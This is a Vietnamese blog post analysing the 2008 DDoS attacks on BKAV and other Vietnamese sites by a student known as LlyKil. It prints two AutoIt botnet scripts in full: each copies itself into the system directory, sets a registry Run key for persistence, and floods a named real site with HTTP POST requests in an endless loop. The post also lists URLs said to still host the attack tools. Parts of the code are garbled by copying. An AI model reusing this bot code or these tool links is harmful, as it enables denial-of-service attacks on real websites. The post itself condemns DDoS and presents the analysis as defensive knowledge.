01 March 2011

[Phân tích] Llykil đã DDOS BKAV như thế nào


Bài viết liên quan:

Từ sáng Chủ Nhật ngày 5/10/2008, trên một số diễn đàn trực tuyến chuyên về IT xuất hiện thông tin cho rằng vài website lớn tại Việt Nam bị tấn công từ chối dịch vụ (DDoS), mà chủ yếu là các website thương mại điện tử như 5giay, nhatnghe, BKAV. Hiện tượng này tái diễn liên tục trong hai ngày tiếp theo (5-7/10/2008).
Ngày 8/10, 5giay.vn là website đầu tiên khẳng định là nạn nhân của hình thức tấn công từ chối dịch vụ. Theo như thông tin 5giay cung cấp, đợt tấn công DDoS ngày 7/10 có qui mô lớn nhất từ trước đến nay từ hàng ngàn máy tính, dẫn đến hệ thống phần cứng quá tải và gián đoạn truy cập.
tiếp theo đó
Bkis và phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công An) chính thức bắt tay truy tìm thủ phạm từ ngày 7/10. Kết quả điều tra cho thấy kẻ gây ra vụ tấn công này là một học sinh Trung học tại Quảng Nam. Thủ phạm đã huy động bạn bè đi cài đặt virus tại các cửa hàng Game, Internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách đó, học sinh này đã tạo dựng được một mạng Botnet với khoảng 1.000 máy tính bị cướp quyền điều khiển. Đây chính là công cụ để thực hiện tấn công  DDoS vào một số website nêu trên vào ngày 8/10. Trước những bằng chứng không thể chối cãi, đối tượng đã thừa nhận hành vi vi phạm với tang vật là chiếc máy tính dùng "chỉ huy" các cuộc tấn công.
Vậy vì sao?
Xem phân tích chi tiết của tác giả www.guru.net.vn 


 1. Code mã nguồn
#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS ProcessList("chem.exe")
If 
$PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir "\chem.exe"1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run""chem""REG_SZ", @SystemDir "\chem.exe")
$
IniRead(@SystemDir "\chem.ini""1""1""")IniWrite(@SystemDir "\chem.ini""1""1", $1)
If $
2 Then
RegDelete
("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run""chem")
EndIf
TCPStartup()Dim $TIN[3]$TIN[0] = "bkav.com.vn"$TIN[1] = "bkav.com.vn"$TIN[2] = "bkav.com.vn"While 1
$NGAUNHIEN 
Random(021)$DATASIZE StringLen("")$HOST $TIN[$NGAUNHIEN]$PAGE "/home.aspx"$SOCKET TCPConnect(TCPNameToIP($HOST), 80)$COMMAND "POST " $PAGE " HTTP/1.1" & @CRLF
$COMMAND 
&= "Host: " $HOST & @CRLF
$COMMAND 
&= "User-Agent: top1.vn" & @CRLF
$COMMAND 
&= "Connection: close" & @CRLF
$COMMAND 
&= "Referer: http://top1.vn" & @CRLF
$COMMAND 
&= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND 
&= "Content-Length: " $DATASIZE & @CRLF
$COMMAND 
&= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND 
&= "" & @CRLF
TCPSend
($SOCKET$COMMAND)WEnd 
thêm nữa:
#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS ProcessList("khpt.exe")
If 
$PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir "\khpt.exe"1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run""khpt""REG_SZ", @SystemDir "\khpt.exe")
$
IniRead(@SystemDir "\khpt.ini""1""1""")IniWrite(@SystemDir "\khpt.ini""1""1", $1)
If $
5 Then
RegDelete
("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run""khpt")
EndIf
TCPStartup()Dim $TIN[3]$TIN[0] = "khpt.vn"$TIN[1] = "khpt.vn"$TIN[2] = "khpt.vn"While 1
$NGAUNHIEN 
Random(021)$DATASIZE StringLen("")$HOST $TIN[$NGAUNHIEN]$PAGE "/forum//index.php"$SOCKET TCPConnect(TCPNameToIP($HOST), 80)$COMMAND "POST " $PAGE " HTTP/1.1" & @CRLF
$COMMAND 
&= "Host: " $HOST & @CRLF
$COMMAND 
&= "User-Agent: LlyKil" & @CRLF
$COMMAND 
&= "Connection: close" & @CRLF
$COMMAND 
&= "Referer: http://google.com" & @CRLF
$COMMAND 
&= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND 
&= "Content-Length: " $DATASIZE & @CRLF
$COMMAND 
&= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND 
&= "" & @CRLF
TCPSend
($SOCKET$COMMAND)WEnd
 Có đoạn ghi:
Đoạn này có thông tin rất cụ thể về LliKil
$COMMAND &= "User-Agent: LlyKil" & @CRL

Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil
viết bằng AutoIt3.
2, Thông tin của Llykil








Trên hình ảnh đã mô tả rõ đặc tính của các chương trình do LlyKil viêt ra : như có kết nối qua IRC kênh #LlyKil,...

Một trong các cách phán toán bot là LlyKil viết chương trình crack BKAV Pro và tung lên mạng (crack dc hay ko thì tôi không chắc)





Một trong số các site chứa mã DDoS hiện nay vẫn tồn tại đó là :
http://diemhen.net/llykil/Server.php
http://diemhen.net/llykil/Update.exe


LlyKil từng lưu trữ các dữ liệu và công cụ phục vụ tấn công trên nhiều site trong đó có trang của chính LlyKil http://llykil.net/
Hình ảnh trang chu trang nay do google cache lại được:




Hình ảnh trên một server khác, nơi được dùng để chứa đồ nghề.



Với những dâu vết để lại như vậy cộng thêm log file của máy chủ thì không khó khăn lắm để có thể nhận ra ai là chủ các cuộc tấn công DDoS trong thời gian qua.
LlyKil đã bị bắt là tấm gương cho các bạn đang đi theo con đường này.
DDoS là một hành vi xấu, ngay cả với giới hacker DDoS được coi là "chơi bẩn". Tuy nhiên để thực hiện được các vụ DDoS cũng đòi hỏi có hiểu biết nhất định. Để chống DDoS mà không biết về DDoS thì thật là khó. Hy vọng những bạn có hiểu biết về DDoS không dùng vào mục đích tấn công.

Video DDOS Trường Tồn (tương tự BKAV)
http://www.mediafire.com/?hobkjoa5dj7qfab

0 comments:

Post a Comment

Để lại góp ý của bạn để blog của mình hoàn thiện hơn :))